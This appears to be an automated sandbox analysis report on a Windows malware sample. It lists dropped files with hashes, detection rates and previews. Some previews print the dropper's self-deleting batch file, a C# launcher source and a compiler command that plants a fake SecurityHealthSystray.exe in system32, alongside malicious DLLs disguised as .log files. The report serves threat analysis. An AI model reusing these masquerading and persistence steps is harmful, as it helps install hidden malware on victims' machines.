                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn2dzsg3.scn.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vujxwfqk.ogo.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbcyr1e5.1at.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl1ojlmv.l5y.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wriif2bp.bwa.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1bovqlv.jp4.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3n0mmi4.eqe.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdnpoig.2gl.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynyq3mpl.cir.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z11cog3h.cux.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziwyn1gs.t2t.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuv1cho2.1ok.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\dw1CZ69dRk

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.0536606896881855
                                                          Encrypted:false
                                                          SSDEEP:3:taVq1Zn:tZn
                                                          MD5:74AC20A2681777EE9E3FB36D28CC18CB
                                                          SHA1:31E457C7755B207DE82FC51034D3E4AF61ED0C9E
                                                          SHA-256:0C3A5899C64077787F726EE24ED7081BEC7A32ECC14CB9FA06329629D4DC4228
                                                          SHA-512:4A1D864302892333F03D33521C7279FEA9DC2F2B6D358F4D3C2F637328F4B2195F455D6D7952F9BB0B06659EF90FB6B699D7F69D7C5F72F3C21367AE65CD7739
                                                          Malicious:false
                                                          Preview:xEkxcgydGvAdQ9g7VxOmQPP9M

                                                          C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):256
                                                          Entropy (8bit):5.149727568596473
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DED+4ThG5q98sKOZG1wkn23fQtLl:HTg9uYDED+/ODfg
                                                          MD5:54DDF71F4B6EACEDA92203C0E23E6025
                                                          SHA1:3061A1EF99ED0A3930741380A6304754B5AF0EC5
                                                          SHA-256:189622D46F59E4980218016BFA78DDE67CAD7F41EE1627A8D716FF55C1EC8100
                                                          SHA-512:052918971CEE0C5ED8F2EFEFAA453B9336E1F983852FF733182AB46CE83CE7D942E030690212785D7F0BC729AF19D46A6E9BCA5FC9A0ED0E2F8AFD1DE2D71C9B
                                                          Malicious:false
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\h43HaGdPC8.bat"

                                                          C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.0.cs

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):381
                                                          Entropy (8bit):4.885641393034701
                                                          Encrypted:false
                                                          SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2JDAfzGBpujiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLLv
                                                          MD5:F6D90CE32D9711B08911B0249D679512
                                                          SHA1:34A43A58DBF731DFAAA50EACAB975EBF1CD9ABF1
                                                          SHA-256:524A05093208B546B809CEACA43733B174814D713BDF32C7020CB4E32CCAF85D
                                                          SHA-512:B36D6C44283774B5DBA0378834B1D964B9D0D748F4D093988DFE41C061D7164FB3D67225F26356BD9D627F9324DE8EBCAD4EE97B309C44C1A874B0F59C72D135
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\fontdriversavescrt\WmiPrvSE.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.098741097506036
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fdMQTn:Hu7L//TRq79cQWf2s
                                                          MD5:70DF5B75FF1CDF9204FB94F861D95A24
                                                          SHA1:9D65537DC62A1C0E399DFEBC4A39842D2B893DE0
                                                          SHA-256:AB739E95A3E09A10D278C355893DD8554FA4ADD994A10D0E0D11B211B8027BCA
                                                          SHA-512:A5ABD3CF8738D5C9F32567F8D82318C4F39B156535AD9600CACC5AB91D3572988E019BF4EB3D59D9A838491997181FA42F526E5DC42BFF0979BAA0AC7B74C935
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.out

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (328), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):749
                                                          Entropy (8bit):5.23878807264005
                                                          Encrypted:false
                                                          SSDEEP:12:+L0hRI/u7L//TRq79cQWf2ZKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:+MI/un/Vq79tWfGKax5DqBVKVrdFAMBt
                                                          MD5:79A11FEE02024A3699AFF7BCBF4863E9
                                                          SHA1:81207301EE41F40561FF4AA8FFEB47F6601F5C90
                                                          SHA-256:AFF113EBB168105349008D4D5E465802828D221BBA0DA4AB6987A44A52144B7D
                                                          SHA-512:AFED4782A2CAFCBE2CE126D51B66B980F22D0F54A4FE26C371F79F6979B7948EDF31CE67B96AD71C37FCB35F46845C285A42D17E646C93A8393A1AC33BA78A1C
                                                          Malicious:false
                                                          Preview:.C:\fontdriversavescrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\Desktop\AdxdALuR.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):5.645950918301459
                                                          Encrypted:false
                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 30%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                          • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                          • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                          • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                          • Filename: 3e88PGFfkf.exe, Detection: malicious, Browse
                                                          • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                          • Filename: 8k1e14tjcx.exe, Detection: malicious, Browse
                                                          • Filename: gkcQYEdJSO.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: CPNSQusnwC.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\IGGSkEKz.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          • Antivirus: Virustotal, Detection: 41%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\gLKxhGkC.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\izOFSTgA.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          • Antivirus: Virustotal, Detection: 35%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\jwqNoTvv.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\ppTmQzAj.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\rzpnRRfk.log

                                                          Download File
                                                          Process:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
